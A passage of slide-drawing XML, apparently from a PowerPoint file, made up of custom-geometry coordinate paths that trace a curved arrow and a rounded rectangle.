                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576305" y="3412422"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1641331" y="3268658"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1627691" y="3268658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596068" y="3341429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562206" y="3412578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562286" y="3412422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576305" y="3412422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607625" y="3346509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1639375" y="3273611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641331" y="3268658"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1596068" y="3341175"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1595948" y="3341429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596068" y="3341175"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1670344" y="3194744"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1656901" y="3194744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627564" y="3268785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641331" y="3268658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1668712" y="3199316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670344" y="3194744"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1696987" y="3119687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1683698" y="3119687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1656774" y="3194998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1656901" y="3194744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670344" y="3194744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695636" y="3123878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696987" y="3119687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1758173" y="2906581"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1745166" y="2906581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1730053" y="2966525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1708082" y="3043868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683571" y="3119941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683698" y="3119687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696987" y="3119687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1720274" y="3047424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1742245" y="2969700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1757485" y="2909629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758173" y="2906581"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1708082" y="3043614"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1708000" y="3043868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1708082" y="3043614"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1730053" y="2966271"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1729981" y="2966525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1730053" y="2966271"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1802531" y="2667313"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1789743" y="2667313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1780853" y="2727257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1770439" y="2787074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758628" y="2846891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1745039" y="2906708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758173" y="2906581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1771074" y="2849431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783012" y="2789360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793426" y="2729162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802316" y="2669091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802531" y="2667313"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1758628" y="2846764"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1770439" y="2786947"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1780853" y="2727130"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1823521" y="2370006"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1810825" y="2370006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806888" y="2488878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806824" y="2489513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802570" y="2548314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1796855" y="2607877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1789616" y="2667567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1789743" y="2667313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802531" y="2667313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809555" y="2609147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815270" y="2549330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819588" y="2489513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823521" y="2370006"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1796855" y="2607750"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1796840" y="2607877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1796855" y="2607750"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1802570" y="2548187"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1802558" y="2548314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802570" y="2548187"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1806888" y="2488624"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1806870" y="2488878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806888" y="2488624"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1821500" y="2252277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1808793" y="2252277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1810698" y="2370387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1810825" y="2370006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823521" y="2370006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821500" y="2252277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1800333" y="2019486"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1787584" y="2019486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1801046" y="2135564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1808793" y="2252531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1808793" y="2252277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821500" y="2252277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821493" y="2251896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1813619" y="2134294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1800333" y="2019486"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1800919" y="2135310"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1800936" y="2135564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1800919" y="2135310"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1652263" y="1463099"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1638740" y="1463099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679126" y="1571049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714305" y="1680650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744150" y="1792156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1768661" y="1905313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1787584" y="2019867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1787584" y="2019486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1800333" y="2019486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781107" y="1902773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756469" y="1788981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1726370" y="1676967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1691064" y="1566731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1652263" y="1463099"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1768534" y="1904932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1768597" y="1905313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1768534" y="1904932"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1744023" y="1791775"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1744106" y="1792156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744023" y="1791775"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1714178" y="1680396"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1714246" y="1680650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714178" y="1680396"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1678999" y="1570795"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1679081" y="1571049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1678999" y="1570795"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1557326" y="1254692"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1543236" y="1254692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543363" y="1254946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593528" y="1358070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638867" y="1463480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638740" y="1463099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1652263" y="1463099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1650551" y="1458527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1605085" y="1352609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1557326" y="1254692"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1593401" y="1357816"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1593510" y="1358070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593401" y="1357816"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1543333" y="1254891"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1502580" y="1154235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1488118" y="1154235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543333" y="1254891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543236" y="1254692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1557326" y="1254692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554539" y="1248977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1502580" y="1154235"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1160996" y="696527"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1143821" y="696527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144075" y="696781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221672" y="781617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295078" y="870136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1364039" y="961830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1428428" y="1056699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1488245" y="1154489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1488118" y="1154235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1502580" y="1154235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1499167" y="1148012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1438969" y="1049714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374199" y="954337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1304857" y="862135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1231197" y="773235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160996" y="696527"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1428174" y="1056445"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1428330" y="1056699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1428174" y="1056445"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1363785" y="961576"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1363958" y="961830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1363785" y="961576"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1294824" y="869882"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1295015" y="870136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294824" y="869882"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1221545" y="781490"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1143837" y="696544"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1144053" y="696781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1143837" y="696544"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1079997" y="615247"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1062033" y="615247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1143837" y="696544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160996" y="696527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1153092" y="687891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079997" y="615247"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="995002" y="537777"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="976054" y="537777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062160" y="615374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079997" y="615247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070796" y="606103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="995002" y="537777"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="515814" y="214562"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="488628" y="214562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488882" y="214689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593657" y="270188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695003" y="330513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792539" y="395283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886392" y="464498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="976181" y="538031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="976054" y="537777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="995002" y="537777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984436" y="528252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894012" y="454465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799651" y="384869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701607" y="319718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599753" y="259012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515814" y="214562"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="886138" y="464371"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="886293" y="464498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886138" y="464371"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="792285" y="395156"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="792457" y="395283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792285" y="395156"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="694749" y="330386"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694940" y="330513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694749" y="330386"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="593403" y="270061"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="593616" y="270188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593403" y="270061"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="488761" y="214633"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="410392" y="164016"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="380424" y="164016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488761" y="214633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488628" y="214562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515814" y="214562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494470" y="203259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410392" y="164016"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="192644" y="78545"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154110" y="78545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269172" y="118677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268791" y="118677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380678" y="164143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380424" y="164016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410392" y="164016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385631" y="152459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273490" y="106739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192644" y="78545"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="74922" y="42131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74354" y="48573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71331" y="54350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154364" y="78672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154110" y="78545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192644" y="78545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158047" y="66480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74922" y="42131"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="33494" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19569" y="4409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8336" y="13723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329" y="27110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="42191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4409" y="56130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13723" y="67401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27110" y="74481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42189" y="75737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56114" y="71290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67347" y="61962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71331" y="54350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36000" y="44001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39683" y="31809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75150" y="31809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71274" y="19569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61960" y="8336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48573" y="1329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33494" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="39683" y="31809"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36000" y="44001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71331" y="54350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74354" y="48573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74922" y="42131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39683" y="31809"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="75150" y="31809"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="39683" y="31809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74922" y="42131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75684" y="33494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75150" y="31809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216907" y="6725411"/>
              <a:ext cx="1061085" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1061085" h="688975">
                  <a:moveTo>
                    <a:pt x="945768" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114934" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33654" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="114808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="574040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33654" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114934" y="688848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945768" y="688848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027049" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060703" y="574040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060703" y="114808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027048" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945768" y="0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216907" y="6725411"/>
              <a:ext cx="1061085" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1061085" h="688975">
                  <a:moveTo>
                    <a:pt x="0" y="114808"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9028" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33654" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114934" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945768" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027048" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060703" y="114808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060703" y="574040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027049" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
